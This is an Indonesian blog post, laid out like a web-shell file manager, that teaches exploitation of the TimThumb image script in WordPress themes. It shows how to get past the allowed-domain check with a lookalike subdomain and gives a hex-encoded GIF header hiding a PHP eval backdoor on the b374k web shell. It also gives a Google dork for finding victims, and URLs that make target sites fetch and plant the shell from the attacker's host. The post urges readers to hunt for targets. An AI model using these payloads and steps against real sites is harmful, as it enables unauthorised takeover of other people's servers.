Lamer
Riau
today : | at : | safemode : ON
> home / facebook / twitter/ free download
name author perms com modified label

Timthumb Exploit dasar dan lanjutan herbet ginting rwxr-xr-x 0 22.03

Filename Timthumb Exploit dasar dan lanjutan
Permission rw-r--r--
Author herbet ginting
Date and Time 22.03
Label
Action
Artikel ini saya tulis atas permintan seorang teman di forum
dia masih bingung tentang expl timtam [kekek jd laper klo bicaraiin ini]
Sudah banyak sekali artikel tentang timthumb yang  sedang ramai di
bicarakan saat ini karena itu Dalam tulisan ini saya sekedar menulis
tulisan tentang timthumb. Exploit timthumb.php ini pertama kali di publish oleh
Mark Maunder ( Vulnerability Disclosed ) di dalam website pribadi nya, dan
kemudian di kembangkan kembali oleh ( Vulnerability Researched )
disini kita akan menggunakan remote injection melalui website domain :D  

Timthumb.php adalah sebuah script php untuk mengubah ukuran gambar di
website , timthum.php sendiri kebanyakan atau hampir 90% di gunakan oleh
theme WordPress Dari semua permintaan fitur TimThumb yang paling populer
adalah mampu untuk memotong gambar dari suatu tempat tertentu, dan mampu
memuat gambar dari situs web eksternal.  Secara default TimThumb dapat
mengubah ukuran gambar host di flickr.com, picasa.com, blogger.com,
wordpress.com, dan img.youtube.com. 

1. Add Domain 

maksud dari add domain di sini adalah add domain website kita atau sub , disini
saya memberikan contoh : domain website saya adalah hermansilalahi.com nah di
sini saya add domain saya menjadi blogger.com.hermansilalahi.com. Kenapa saya
membuat domain seperti itu ?  Karena di sini timthumb adalah default plugin
yang hanya bisa mengubah ukuran gambar dari domain berikut :

---------------------------------------------==
$allowedSites = array (
 'flickr.com',
 'picasa.com',
 'blogger.com',
 'wordpress.com',
 'img.youtube.com',
 'upload.wikimedia.org',
);
------------------------------------------------

Nah maksud dari $allowedSites adalah timthumb.php hanya bisa mengambil
image dari luar (external image) dari situs di atas.

------------------------------------------------
if (strpos (strtolower ($src), 'http://') !== false || strpos (strtolower
($src), 'https://') !== false)
if (strpos (strtolower ($url_info['host']), $site) !== false)
------------------------------------------------

Ingat untuk domain yang saya gunakan tadi blogger.com.hermansilalahi.com hanya
sebuah contoh bisa juga picasa.com.hermansilalahi.com , atau lainnya

2. Create Shell

Maksud dari Create shell adalah di sini kita menambahkan code image GIF yang
telah kita Decode, 

------------------------------------------------
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
------------------------------------------------

Kode Hex di atas kita Decode ke String, dan hasil nya :
------------------------------------------------
GIF89a ? ????���???!�  ????,???? ? ??  D ?;?
------------------------------------------------

Kode di atas kita masukan di atas script shell, di sini saya menggunakan
shell b374k :

------------------------------------------------
GIF89a ? ????���???!�  ????,???? ? ??  D ?;?
<?php

// mdnhacker@gmail.com
// no malware on this code, you can check it by yourself ;-) 

@error_reporting(0);
@set_time_limit(0);

$code = "script shell"
------------------------------------------------

ingat di sini kita masukan kode hasil Yang telah kita decode tadi di atas
<?php di sini saya save shell tersebut dengan ekstensi b374k.php

3. Upload Shell in Domain Website

Yupz lanjut lagi setelah tadi sudah kita persiapkan senjata atau shell
b374k.php untuk inject kita upload tadi ke domain website kita, di atas
tadi saya sudah add domain blogger.com.hermansilalahi.com nah sekarang kita
upload shell b374k.php Dan hasil dari shell b374k.php yang telah di upload
di website tersebut adalah http:\\blogger.com.hermansilalahi.com/b374k.php

4. Exploitasi

Nah setelah tadi sudah upload shel inject atau senjata tadi yang berada di
http:\\blogger.com.hermansilalahi.com/b374k.php sekarang waktunya kita mencari
target di si mbah google :D  Di sini saya menggunakan dork dari timthumb.php
adalah :

inurl:/wp-content/themes/twenteen/timthumb.php

Setelah sudah mendapatkan target waktunya exploitasi , contoh untuk
eksploitasi nya adalah :

http://contohtarget.com/wp-content/themes/twenteen/timthumb.php?src=

http:\\blogger.com.hermansilalahi.com/b374k.php

Setelah masuk akan ada pemberitauan :

http://target.com/wp-content/themes/twenteen/../cache/external_565bcf5dxxx.php

setelah terdapat tulisan seperti itu coba kita buka apakah hasil nya masuk
atau tidak , tapi kebanyakn memang jika sudah seperti itu kita telah masuk
dan sudah menanam shell :D  , yuk mari buka link tersebut :

http://target.com/wp-content/themes/twenteen/cache/external_565bcf5dxxx.php

Nah setelah shell masuk terserah mau di apakan , pergunakan lah sebaik2 nya .
* Untuk versi timthumb.php 1.* - 1.32 ini masih banyak yang bisa kita
eksploitasi, untuk versi 1.32 mungkin sudah tidak bisa di eksploitasi
karena telah di upadte dari develop nya
ref: http://www.exploit-db.com/wordpress-timthumb-exploitation/

0 komentar:

Posting Komentar

 

Jayalah Indonesiaku © 2010 blog newbie-herbet
root@newbie-herbetnewbie-herbet